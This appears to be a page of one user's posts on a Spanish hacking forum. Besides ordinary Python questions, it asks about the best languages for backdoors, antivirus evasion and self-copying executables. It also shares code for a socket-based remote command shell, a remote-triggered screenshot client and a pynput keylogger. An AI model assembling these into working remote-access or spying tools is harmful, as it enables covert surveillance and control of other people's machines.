elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Temas
Páginas: 1 [2] 3
11  Programación / Scripting / Donde esconder las contraseñas - Python en: 6 Febrero 2023, 15:19 pm
Hola, estoy haciendo un programa en python para cifrar archivos de una carpeta y quiero que se puedan descifrar solo con el pin que el usuario establezca, la pregunta es, como puedo ocultar o cual sería la mejor forma de ocultar la contraseña que el usuario ingresa en mi programa, ahora mismo simplemente se guarda en un archivo binario, pero cualquiera con notepad++ o sublime text podría leer la contraseña, y aunque la cifre tendría el mismo problema :'0 donde escondo la llave de cifrado?
12  Seguridad Informática / Análisis y Diseño de Malware / Lenguaje ideal para backdoors - malware en: 4 Diciembre 2022, 08:52 am
Hola, tengo una duda, que lenguajes de programación es conveniente usar a la hora de crear backdoors y malware en general para infectar computadoras con windows

también quería qué utilidad tienen los .bat
13  Programación / Scripting / PYTHON - error loading python dll en: 2 Diciembre 2022, 06:16 am
Hola, estoy haciendo un programa en python, utilizo windows 10 de 64 bits, pero quiero que mi programa se pueda ejecutar en computadoras con windows 7

hago mis .exe con pyinstaller, y al ejecutarlo en windows 10 funciona perfectamente, pero en el caso de windows 7 me sale este error... Saben a qué se debe? Busqué en internet y no me quedó claro si es a causa de pyinstaller o de la versión de python que utilizo ya que en la pagina oficial de la documentación de python dice que en caso de necesitar compatibilidad con windows 7 descargue la versión de python 3.8 y es la que tengo instalada ahora mismo. Agradecería cualquier consejo o info   :(



14  Programación / Scripting / hacer que mi .exe hecho con python sepa su propia ubicación en: 30 Noviembre 2022, 09:19 am
Hola, saben si hay alguna forma de que mi programa de python pueda extraer su propia ubicación en disco independientemente de donde se ejecute? para crear una copia de si mismo en otros directorios. Probé con __file__ pero lo que hace es buscar la ruta del .py en el que estoy escribiendo mi código y al momento de volver mi .py en un .exe da un error porque devuelve una ruta erronea, intenté también con os.environ["nombre.exe"] pero no termino de entender como funciona. ayuda :'0
15  Programación / Scripting / Python - dar formato a b"informacion" en: 15 Noviembre 2022, 23:59 pm
Hola, tengo una duda, estoy aprendiendo a utilizar sockets en python, y lo que estoy intentando es, que el cliente se conecte al programa servidor y desde el servidor yo poder ejecutar comandos en la computadora cliente y esta me devuelva los resultados


estoy usando la biblioteca subprocess para ejecutar el comando y almacenar el resultado en una variable pero luego de enviarla el servidor la recibe de esta manera:

Quiero saber como puedo darle formato para que me lo muestre correctamente, estoy intentando ejecutar el comando dir en windows







Codigo Cliente:

import socket
import subprocess


def ejecutar_comando(command):
   return subprocess.check_output(command, shell=True)


HOST = 'localhost'
PORT = 6123

cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cliente.connect((HOST,PORT))

while True:
   command = cliente.recv(1024)
   command = command.decode('utf-8')
   resultados_comando = ejecutar_comando(command)
   cliente.send(resultados_comando)

cliente.close()



Código Servidor:

import socket


HOST = 'localhost'
PORT = 6123

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
server.listen()

print("Esperando conexiones...")

conn, addr = server.accept()

print("Conexión establecida con" + str(addr))

while True:
   command = input("Shell<<<:")
   conn.send(command.encode('utf-8'))
   resultado_comando = conn.recv(1024)
   print(resultado_comando)

conn.close()





16  Programación / Scripting / Duda, instrucción shutdown() - sockets python en: 4 Julio 2021, 19:16 pm
Estuve creando un cliente y servidor, el código que estoy dejando es el del cliente, que se conecta a al servidor y luego se queda a la escucha de una orden, la única a la que responde ahora mismo es a la de tomar un screenshot y enviarla hacia al servidor, al principio el servidor nunca dejaba de recibir información por lo que se quedaba trabado, luego investigando descubrí la instrucción shutdown() que le indicaba al servidor que ya no estaba recibiendo información así podía recibir la imagen e ingresar otra orden. Mi problema es que s.shutdown(socket.SHUT_WR) lo que hace es cerrar uno de los lados de la conexión impidiéndole al cliente enviar información a través del socket así que cuando nuevamente doy la orden de tomar un screenshot el cliente la recibe pero no puede enviar la imagen, saben alguna solución o una forma de "reabrir" el socket para nuevamente enviar información hacia al servidor?

Código:

import socket
import pyscreenshot




HOST = 'localhost'
PORT = 4444

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))

print('Conexión establecida')

while True:
orden = s.recv(1024)

if orden == b'screenshot':
#tomo un pantallazo y lo guardo en formato png

img = pyscreenshot.grab()
img.save("captura.png")

#abro la imagen en modo lectura binaria para enviarla

f = open("captura.png", "rb")
imagen = f.read()

while imagen:
s.send(imagen)
imagen = f.read()

# se termina el envio de la imagen

print("Imagen enviada")
s.shutdown(socket.SHUT_WR)
f.close()
del(f)



Dejo también el código del servidor, por si sirve de algo

Código:
import socket
import datetime

fechayhora = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')



HOST = 'localhost'
PORT = 4444

socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.bind((HOST, PORT))
socket.listen()

print('Servidor a la escucha...')

conn, addr = socket.accept()

print('Conexión entrante de ' + str(addr))

with conn:

while True:
orden = input('Ingresa una orden: ')
orden = orden.lower()

if orden == 'screenshot':
conn.send(b'screenshot')

#recibo la imagen enviada desde el cliente
f = open('capturas\\screenshot_' + str(fechayhora) + '.png', 'wb')
imagen = conn.recv(1024)

while imagen:

f.write(imagen)
imagen = conn.recv(1024)


f.close()
print('Imagen recibida')


elif orden == 'salir':
quit()
17  Seguridad Informática / Hacking / Cómo ocultar malware? en: 4 Julio 2021, 08:01 am
Como puedo ocultar programas ante un antivirus? puede que sea cuestión de ingenio, pero supongo que también habrá algunos conocimientos base de los cuales partir, que me recomendarían estudiar o investigar? No sé por donde empezar   :-\
18  Programación / Scripting / Duda sobre la utilidad de los sockets en: 26 Junio 2021, 07:18 am
Estuve leyendo sobre sockets, y lo que pude entender es que sirven para crear un enlace entre una aplicación cliente y otra servidor, pongamos como ejemplo que yo creo un programa con python que tiene como función tomar screenshots, pero no quiero que lo haga de forma periódica sino por una orden en un panel de control desde otra computadora, el aprender sobre sockets me ayudaría a crear una aplicación así o estoy equivocado? :P
19  Programación / Scripting / Quitar comillas de un string - python en: 23 Junio 2021, 19:13 pm
Hola, estuve intentando hacer un keylogger utilizando pynput, y funciona perfectamente, la cosa es que tengo pensado que las pulsaciones se guarden en un archivo externo, pero no he podido retirar las comillas de las teclas que registra el Keylogger.

Código:

from pynput import keyboard

def on_press(key):
key = str(key)
key.replace("'", "")
print(key)



with keyboard.Listener(on_press=on_press) as Listener:
Listener.join()

creí saber como se hacía, siempre utilizo replace() pero esta vez las teclas que presiono siguen imprimiéndose en consola con las comillas y también se guardan así cuando intento ponerlas en un archivo externo, saben a que se puede deber? O conocen otra forma para retirar las comillas?  :P
20  Programación / Scripting / Error de selenium - Python en: 17 Junio 2021, 11:22 am
"Unknow error unable to discover open pages"

Es ese el error que me aparece en consola luego de ejecutar mi programa.

Hace unos días que quise empezar a hacer ejercicios de web scraping con python y selenium porque por lo que leí es la opción más completa y fácil de aprender pero lo único que he conseguido es que se abra una ventana de Google Chrome, luego de eso se cierra y aparece el error en consola sin haber accedido a la url que le indico.

https://ibb.co/p4BKkCF (dejo aquí un link hacia la imagen de lo que aparece en consola, no sé bien si hay otra forma de insertar imágenes aquí)

Me aseguré que la versión de webdrive que descargué fuera la indicada para mi navegador intenté incluso con cosas que seguramente no tenían nada que ver con el problema, actualicé pip y reinstale selenium y nada.  :-\

https://ibb.co/y8F35XH (este es el código que escribí)
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines